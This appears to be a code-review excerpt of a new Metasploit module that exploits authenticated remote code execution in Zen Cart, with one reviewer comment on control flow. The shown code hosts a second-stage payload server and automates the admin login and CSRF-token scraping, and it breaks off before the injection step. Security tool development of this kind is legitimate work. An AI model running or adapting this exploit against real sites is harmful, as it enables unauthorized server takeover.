modules/exploits/linux/http/zencart_authenticated_rce.rb

```diff
@@ -0,0 +1,200 @@
+            ssltut = true
+            datastore["SSL"] = false
+        end
+        start_service({'Uri' => {
+            'Proc' => Proc.new { |cli, req|
+              on_request_uri(cli, req)
+            },
+            'Path' => resource_uri
+        }})
+        print_status("payload is on #{get_uri}")
+        @adresim = get_uri
+        datastore['SSL'] = true if ssltut
+    end
+    
+    def on_request_uri(cli, request)
+        print_good('First stage is executed ! Sending 2nd stage of the payload')
+        send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
+      end
+
+    def tabanyol
+        datastore["BASEPATH"]
+    end
+
+    def isim
+        datastore["USERNAME"]
+    end
+
+    def parola
+        datastore["PASSWORD"]
+    end
+
+
+    def login
+        res = send_request_cgi(
+        'method'    => 'GET',
+        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php")
+        )
+        # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
+        unless res
+            fail_with(Failure::Unreachable, "Access web application failure")
+        end
+        if res.code != 200
+            fail_with(Failure::Unreachable, "we not have 200 response")
+        end
+
+        if !res.get_cookies.empty?
+            @cookie = res.get_cookies
+            @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
+            if @csrftoken.empty?
+                fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+            end
+            vprint_good("login Csrf token: "+@csrftoken)
+        end
+
+        res = send_request_cgi(
+            'method' => 'POST',
+            'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
+            'cookie' => @cookie,
+            'vars_post' => {
+                'securityToken' => @csrftoken,
+                'action' => "do"+@csrftoken,
+                'admin_name' => isim,
+                'admin_pass' => parola
+            })
+            if res.code != 302
+                fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+            end
+            true
+        end
+
+
+    def check
+        unless login
+            fail_with(Failure::UnexpectedReply, 'Target Not Vulnerable')
+        end
+        print_good("We loged in")
+        Exploit::CheckCode::Vulnerable
+
+    end
+
+    def exploit
+        check
+        start_server
+        res = send_request_cgi(
+            'method' => 'GET',
+            'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=modules&set="+datastore["MODULE"]+"&module="+datastore["SETTING"]+"&action=edit"),
+            'cookie' => @cookie
+        )
+        # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
+        if res && res.code == 200
```

Comment:
The module can return early here with an error message, rather than wrapping the remainder of this method inside this conditional branch.